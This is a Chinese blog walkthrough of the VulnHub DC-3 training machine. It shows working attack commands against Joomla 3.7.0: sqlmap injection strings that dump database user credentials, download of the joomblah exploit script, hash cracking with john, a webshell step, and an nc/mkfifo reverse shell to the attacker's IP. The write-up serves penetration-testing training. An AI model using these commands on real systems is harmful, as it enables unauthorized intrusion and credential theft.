DC系列:3(DC-3靶机,初级渗透详细教程)

最新推荐文章于 2024-04-15 18:06:10 发布
最新推荐文章于 2024-04-15 18:06:10 发布
阅读量1.4k 收藏 9
点赞数 1
分类专栏: kali 漏洞复现 文章标签: python 前端 前端框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45671944/article/details/121636250
版权

DC-3靶机渗透

环境搭建

当出现DE 设备 (磁盘/CD-ROM)配置不正确。“ide0:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide0:1”移到“ide0:0”。错误时,
将IDE改为0:0即可
在这里插入图片描述

详情

名称DC- 3
发布日期2020年4月25日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-32,312/

描述

DC-3是另一个专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验。
与以前的DC版本一样,这个版本在设计时考虑到了初学者,尽管这一次只有一个标志,一个入口点,根本没有线索。
Linux技能和对Linux命令行的熟悉程度是必须的,基本的渗透测试工具的一些经验也是必须的。
对于初学者来说,Google可以提供很大的帮助,但你可以随时在@DCAU7上发推文给我,寻求帮助,让你再次前进。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。
对于那些有CTF和Boot2Root挑战经验的人来说,这可能根本不会花费你很长时间(事实上,它可能需要不到20分钟的时间)。
如果是这样的话,如果你希望它成为一个更大的挑战,你可以随时重做挑战,并探索其他获得根和获得旗帜的方法。

使用工具

攻击者:kali 192.168.10.153
靶机:dc-3 192.168.10.161

一:信息收集

0x01 查看存活主机

arp-scan -l 二层主机扫描,主动发送ARP包进行嗅探

在这里插入图片描述

0x02查看开放端口

masscan --rate=100000 --ports 0-65535 192.168.10.161

在这里插入图片描述

0x03 查看端口服务

nmap -sV -T4 -O -p 80 192.168.10.161

在这里插入图片描述

0x04 下载joomscan

apt install joomscan

在这里插入图片描述

0x05查看joomscan版本信息

joomscan -u http://192.168.10.161

在这里插入图片描述

二:漏洞发现

查看版本漏洞

searchsploit joomla 3.7.0

在这里插入图片描述

cat webapps/42033.txt

在这里插入图片描述

漏洞利用

方法一:sql注入

提示使用sql注入

sqlmap -u
“http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”
–risk=3 --level=5 --random-agent --dbs -p list[fullordering]

查库名

1:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

在这里插入图片描述

查表名

2:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb  --tables  -p list[fullordering]

在这里插入图片描述

查列名

3:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --risk=3 --level=5 --random-agent -D joomladb  -T "#__users" --columns   -p list[fullordering]

在这里插入图片描述

查找字段信息

4:sqlmap -u "http://192.168.10.161/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  --risk=3 --level=5 --random-agent -D joomladb  -T "#__users" -C "name,password,username" --dump   -p list[fullordering]

在这里插入图片描述

方法二:使用joomblah脚本

下载 joomblah.py 脚本

wget
https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py

在这里插入图片描述

执行joomblah获得密码密文

python2 joomblah.py http://192.168.10.161
在这里插入图片描述

破解加密

0x01 保存密文文件

vim adminhash.txt
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

0x02 识别hash类型并破解

john adminhash.txt
john --show adminhash.txt

在这里插入图片描述

0x03 写入一句话木马

进入网站,写入一句话木马
在这里插入图片描述

0x04 蚁剑直连

0x05 反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.153 443 >/tmp/f

在这里插入图片描述

四:提权

0x01 查看版本信息

在这里插入图片描述

0x02 查看版本漏洞

在这里插入图片描述

0x03 下载漏洞执行压缩包

在这里插入图片描述

0x04 解压执行payload

在这里插入图片描述

0x05 获取flag

在这里插入图片描述

在这里插入图片描述

总结

这个靶机考察了使用者对于cms的利用手段,hash密文爆破方式,sqlmap的使用方式,对于漏洞的利用能力

jrdh1209
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-3靶机渗透详细教程(附靶机链接)
bwt_D的博客
11-12 5531
靶机链接:https://pan.baidu.com/s/1Q3OuzI8mr-0G6AEagw_XBg 提取码:0na8 首先查看本机kali的ip地址:192.168.159.145 ifconfig 利用nmap扫描靶机IP nmap -sP 192.168.159.1/24 查看靶机mac地址 打开虚拟机设置,点击网络适配器——高级 根据靶机的mac地址匹配nmap的扫描结果确认靶机IP为192.168.159.141 使用nmap进行完整扫描 nmap -A 192.168.159.141
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
解决:DC-3 IDE 设备(兹盘/CD-ROM)配置不正确。“ide0:1“上具有 个 IDE 从设备但没有主设备。此配置在虚拟机中 无法正常运行。
最新发布
旺仔Sec&blog
04-15 241
IDE 设备(兹盘/CD-ROM)画置不正确。"ide0:1"上具有个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从。解决:DC-3 - VMware Workstation。ide0:1"移到"ide0:0:.。
DC-3.2靶机
weixin_45778886的博客
11-22 3313
下载安装 靶场的下载:http://www.five86.com/downloads/DC-3-2.zip 信息收集 存后活主机探测 nmap -sP 192.168.124.0/24 端口服务探测 nmap -A 192.168.124.23 目录扫描 python3 dirsearch.py -u http://192.168.124.23/ -e* -i 200 发现管理员登录界面 网站服务探测 访问网站 网站的内容管理系统为Joomla.操作系统为Ubuntu. Joomla的版本为
Vulnhub-DC-3靶场练习
qq_44877412的博客
01-20 911
Vulnhub-DC-3 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机DC-3 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 可能会遇到如下报错: IDE设备(磁盘/CD-ROM)配置不正确。"ide0:1"上具有一个IDE从设备, 但没有主设备。此配置在虚拟机中无法正常运行。 请使用配置编辑器将磁盘/CD-ROM 从"ide0:1"移到"ide0:0”。 解决办法
DC-3靶机
weixin_73668856的博客
01-20 192
dc-3靶机的复现
IDE 设备(磁盘/CD-ROM)配置不正确。“ide1:1”上具有一个 IDE 从设备,但没有主设备。此配置在虚拟机中无法正常运行。请使用配置编辑器将磁盘/CD-ROM 从“ide1:1”移到“id
mogexiuluo的博客
06-13 609
选择具体的虚拟机,点 “虚拟机”->“设置”->选择 “磁盘/光驱IDE设备" ->点 ”高级“,将要 启动设备 设置到 IDE 0:0 上就可以了。
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 1831
DC-3靶机渗透测试详细教程
靶机4 DC-3(过程超详细
honest_gg的博客
09-26 970
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
Vulnhub靶机:DC-3渗透详细过程
IerkeU的博客
02-21 2393
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,只有一个入口点和一个flag,并且没有任何线索。 靶场只需要简单的下载,解压,打开并将其导入到VMware即可(我将其网络配置为NAT模式,保证机器与kali在同一个网段下) nmap -sP 192.168.
DC-3靶机渗透测试
weixin_48991458的博客
11-23 4066
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这里有个坑,VMware用户要官网下的第二个镜像才能发现IP地址,这里官方也有说明,可以仔细看一下,这里也贴出来了 两台主机设为NAT模式,靶机需要改一下设置,默认是桥接 开始操作 先信息收集,两台主机在一个局域网下用netdiscover扫起来,在结合mac地址很快就能发现靶机IP 靶机mac地址在虚拟机设置
【CyberSecurityLearning 72】DC系列DC-3渗透测试(Joomla)
_Co1a
04-24 858
目录 DC-3靶机渗透测试 一、实验环境 二、渗透过程演示 1、信息搜集 2、SQL注入 3、登录后台 4、反弹shell 5、提权 总结: DC-3靶机渗透测试 DC-3也是一个黑盒测试,我们所能知道的只有它的MAC地址,我们可以根据它的MAC地址来确定IP地址 一、实验环境 实验环境: kali2021:192.168.3.155/24(桥接到vmnet0) 靶机环境DC-3(桥接到vmnet0,MAC地址:00:0C:29:2C:47:A4) ...
无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。您要在每次开启此虚拟机时都尝试连接此虚拟设
热门推荐
njswdfj的博客
01-18 5万+
无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。您要在每次开启此虚拟机时都尝试连接此虚拟设 安装虚拟机时出现提示:无法连接虚拟设备 ide1:0,因为主机上没有相应的设备。您要在每次开启此虚拟机时都尝试连接此虚拟设备吗? ide1:0一般是虚拟机的光驱,配置选项是“使用物理驱动器”,而宿主机可能没有光驱,改为“使用ISO映像文件”即可 改为 使用ISO镜像文件 ...
DC-3靶场搭建及渗透实战详细过程(DC靶场系列
金 帛的博客
07-27 5016
DC-3靶场渗透过程
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值